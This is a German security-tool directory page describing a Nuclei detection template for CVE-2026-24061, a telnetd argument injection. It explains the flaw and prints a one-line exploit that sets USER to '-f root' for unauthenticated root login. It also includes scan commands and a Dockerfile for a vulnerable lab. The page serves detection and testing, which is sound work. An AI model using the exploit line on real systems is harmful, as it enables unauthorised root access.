Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/mr-zapi/cve-2026-24061
SchwachstellenscannerExploitationWebanwendungs-ExploitationNetzwerksicherheitPenetrationstestsLernen & Bildung
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Nuclei-Vorlage zur Erkennung von CVE-2026-24061, einer kritischen Telnet-Argumentinjektion in GNU inetutils telnetd, die nicht authentifizierten Root-Zugriff ermöglicht.

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061 - Telnet Argument Injection

Nuclei-Template zur Erkennung der Schwachstelle CVE-2026-24061 in GNU inetutils telnetd, die Root-Zugriff ohne Authentifizierung ermöglicht.

📋 Beschreibung der Schwachstelle

CVE-2026-24061 ist eine kritische Argument-Injection-Schwachstelle in GNU inetutils telnetd, die es einem Angreifer ermöglicht, eine Root-Shell ohne Kenntnis des Passworts zu erhalten.

Wie funktioniert das?

  1. Ursache des Problems: Im Jahr 2015 wurde in telnetd ein neues Login-Muster mit dem dynamischen Parameter %U hinzugefügt:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. Schwachstelle: Die Umgebungsvariable USER wird über das Telnet-Protokoll (RFC 1572 NEW-ENVIRON) übertragen und nicht bereinigt, bevor sie in den Befehl eingesetzt wird.

  2. Ausnutzung: Der Angreifer setzt USER="-f root" bei der Verbindung:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. Ergebnis: Der Login-Befehl wird zu:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

Das Flag -f bedeutet "Authentifizierung überspringen" → Root ohne Passwort 💀

🎯 Betroffene Versionen

  • GNU inetutils telnetd mit anfälligem Login-Muster
  • Zum Beispiel: inetutils-telnetd 2:2.0-1+deb11u2
  • Systeme, auf denen telnetd Autologin ohne Kerberos verwendet

🚀 Verwendung

Basis-Scan

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Mehrere Ziele

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 Testlabor

Für Tests kann ein anfälliger Docker-Container gestartet werden:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

Start:

root@kitploit:~
# Image erstellen
docker build -t vuln-telnetd .

# Starten
docker run -d -p 2323:23 vuln-telnetd

# Schwachstelle prüfen
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ Schutz

  1. inetutils aktualisieren auf die gepatchte Version
  2. telnetd deaktivieren und SSH verwenden
  3. Port 23 filtern an der Firewall
  4. Telnet-Verbindungen überwachen

📚 Links

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 CVSS-Score

9.8 / 10 - Kritisch

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Network (Angriff über das Netzwerk)
  • AC:L - Low complexity (leicht auszunutzen)
  • PR:N - No privileges required (keine Authentifizierung erforderlich)
  • UI:N - No user interaction (automatische Ausnutzung)
  • C:H/I:H/A:H - Hohe Auswirkung auf Vertraulichkeit, Integrität und Verfügbarkeit

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für legale Sicherheitstests von Systemen bestimmt, für die Sie eine ausdrückliche Genehmigung haben.

Der Autor übernimmt keine Verantwortung für die missbräuchliche Verwendung dieser Vorlage.

👤 Autor

Erstellt von Mr.Zapi

Tool herunterladen